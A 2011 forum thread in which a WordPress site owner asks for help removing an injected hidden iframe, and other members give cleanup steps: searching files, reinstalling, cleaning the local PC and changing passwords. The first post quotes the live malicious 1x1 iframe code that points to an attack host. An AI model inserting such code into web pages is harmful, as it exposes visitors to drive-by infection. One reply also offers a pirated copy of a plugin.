1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Little help please :)

Discussion in 'BlackHat Lounge' started by wowhaxor, Aug 18, 2011.

  1. wowhaxor

    wowhaxor Executive VIP Premium Member

    Joined:
    Apr 28, 2007
    Messages:
    2,021
    Likes Received:
    3,353
    Location:
    ?¿?
    Home Page:
    Hey,

    So I have a WP site that's infected with something but I can't figure out where. Its not in the theme I don't think because it is even there in my WP dashboard area. Checked htaccess and that's clean.

    Its this iframe right here:

    Code:
    <iframe frameborder=0 height=1 width=1 scrolling=no src='http://stormnouc.cx.cc/forum.php?tp=5d13ed839d54210e' > </iframe>
    
    Its on all my pages but I can't figure out how to get rid of it :(

    Help would be greatly appreciated!
     
    • Thanks Thanks x 1
  2. bk071

    bk071 Jr. Executive VIP Jr. VIP Premium Member

    Joined:
    Nov 24, 2010
    Messages:
    3,104
    Likes Received:
    7,914
    Occupation:
    I don't have a job
    Location:
    .............
    Did you recently install some plugin?
    What theme are you using?
     
    • Thanks Thanks x 1
  3. wowhaxor

    wowhaxor Executive VIP Premium Member

    Joined:
    Apr 28, 2007
    Messages:
    2,021
    Likes Received:
    3,353
    Location:
    ?¿?
    Home Page:
    No recent plugins

    theme is "masterful"
     
  4. bk071

    bk071 Jr. Executive VIP Jr. VIP Premium Member

    Joined:
    Nov 24, 2010
    Messages:
    3,104
    Likes Received:
    7,914
    Occupation:
    I don't have a job
    Location:
    .............
    Alright, similar shit happened to me a few months back...

    Here's a tip to find out whats wrong:

    Download ALL files to your desktop with filezilla or any ftp client.
    Open notepad++ and press Ctrl+Shift+F or go to Search -> Find in files.
    Select the folder you downloaded your site's files to.
    Search for: stormnouc.cx.cc

    More than likely, you will find where the problem is.

    I'd suggest you back up your site, uninstall wordpress and re-install it.
    Backup Buddy is awesome for backups. Hit me a PM if you want a working copy of backup buddy ;)

    Cheers.
     
    • Thanks Thanks x 1
  5. wowhaxor

    wowhaxor Executive VIP Premium Member

    Joined:
    Apr 28, 2007
    Messages:
    2,021
    Likes Received:
    3,353
    Location:
    ?¿?
    Home Page:
    OK,

    I was going to do that but am quite lazy so I was hoping someone knows where the malicious code is. Thanks and I'll give it a few hours to see if anyone else was infected with this, if not I'll do that :)
     
  6. bk071

    bk071 Jr. Executive VIP Jr. VIP Premium Member

    Joined:
    Nov 24, 2010
    Messages:
    3,104
    Likes Received:
    7,914
    Occupation:
    I don't have a job
    Location:
    .............
    The whole thing takes 5 minutes :)
     
  7. littleg2008

    littleg2008 Senior Member

    Joined:
    Dec 3, 2009
    Messages:
    861
    Likes Received:
    421
    Location:
    Cambridgeshire, UK
    can you remove the theme and then reinstall it? your content shall stay, depends if you placed anything in a child theme
     
    • Thanks Thanks x 1
  8. wowhaxor

    wowhaxor Executive VIP Premium Member

    Joined:
    Apr 28, 2007
    Messages:
    2,021
    Likes Received:
    3,353
    Location:
    ?¿?
    Home Page:
    As I said, quite lazy :)

    Ya, I can try that first.
     
  9. jamescraigmtts

    jamescraigmtts Newbie

    Joined:
    Jul 28, 2011
    Messages:
    24
    Likes Received:
    2
    Thanks and I'll give it a few hours to see if anyone else was infected with this..
     
  10. ericsson

    ericsson Elite Member Premium Member

    Joined:
    Apr 25, 2009
    Messages:
    2,642
    Likes Received:
    8,132
    Occupation:
    www
    Location:
    Swe
    Home Page:
    Code:
    http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http%3A%2F%2Fstormnouc.cx.cc%2Fforum.php&client=googlechrome&hl=en-US
     
    • Thanks Thanks x 1
  11. AutoBlogger

    AutoBlogger Power Member

    Joined:
    Oct 20, 2009
    Messages:
    780
    Likes Received:
    928
    Occupation:
    IM, AutoBlogging and Urban Planning
    Location:
    The Global Village
    It was infected from your local machine. It is called something ramnit.exe or something. Puts iframe in all .php/.html/.aspx or other extension's files.
    Do not extract your theme file in your PC. Upload it in in .zip and later extract in your server.
    Faced the same situtation a few months back. This might work.
     
    • Thanks Thanks x 1
  12. wowhaxor

    wowhaxor Executive VIP Premium Member

    Joined:
    Apr 28, 2007
    Messages:
    2,021
    Likes Received:
    3,353
    Location:
    ?¿?
    Home Page:
    That makes sense. I just got done cleaning up some viruses a couple of days ago!
     
  13. popzzz

    popzzz Supreme Member

    Joined:
    Apr 12, 2009
    Messages:
    1,337
    Likes Received:
    13,699
    Location:
    Don't touch the REP!

    7 Steps to remove Iframe virus

    Step 1

    First Install this wordpress plugin AntiVirus 0.4,then scan your templates,if you find any harmful code or virus indication.

    Now Block access to your site by creating a temporary page index.htm and upload it to the server explaining that your site is down temporarily,this prevents infecting others PC's,also ask your hosting service to scan your server.

    Step 2

    Now start cleaning viruses in your PC,update your anti-virus or Install branded or good working Internet security suites, as i said before the origin of infection to your site will be your PC which some how get infected through other sites.

    Step 3
    After complete cleaning , now Change all your FTP and cpanel passwords or ask your Site Hosting staff to change them if you do not know how to change.

    Step 4

    Now uninstall your FTP(desktop) software, and all the registry entries with nice uninstaller( I recommend Revo uninstaller) and install new software(Filezilla recommended)

    Step 5
    Don't delete the files on the server ,What you need to do is replace the infected files with original files.
    Some times your Webhoster may help you restore instead of going through all this fixing,but maintaining the site is the responsibility of the customer.

    Step 6

    Now Download same WordPress version,themes (Fresh copy) and plugins,scan them and check if there is iframe code in them with TextCrawler(freeware),then start replacing infected files with these files.Then remove unwanted themes and plugins.

    Reopen your web site and check if your Antivirus prompt any alert about the site.

    Step 7

    The Iframe virus or malware can infect any files (.php, .html, .asp) which have got </body> tag,below are some common files where we can find this code
    index.php in root folder
    wp-config.php in root folder( carefully while replacing this file,it contains database information like, user name and password)
    index.php in wp-admin folder
    index-extra.php in wp-admin folder
    index.php in wp-contents\yourtheme\ folder
    home.php in wp-contents \ yourtheme \ folder
    default-filters.php in wp-includes folder

    Reference: http://www.techno360.in/7-steps-to-remove-iframe-virus-from-your-wordpress-blog/#ixzz1WURdcAyM
    Enjoy ..... :cool2:


     
  14. quyen.hong

    quyen.hong Newbie

    Joined:
    Aug 29, 2011
    Messages:
    5
    Likes Received:
    0
    Occupation:
    It manager
    Location:
    www.vietnamtourpackages.com
    Home Page:
    realy it! if you do it with notepad++ you must do one by one for each file, so tired, you can use Dreamware and add a local site in Dreamware by managersite tool on Dreamware and find code eary!

    gud luck
     
  15. bk071

    bk071 Jr. Executive VIP Jr. VIP Premium Member

    Joined:
    Nov 24, 2010
    Messages:
    3,104
    Likes Received:
    7,914
    Occupation:
    I don't have a job
    Location:
    .............
    You can download the files to a folder then use 'Find in Files' feature of Notepad++.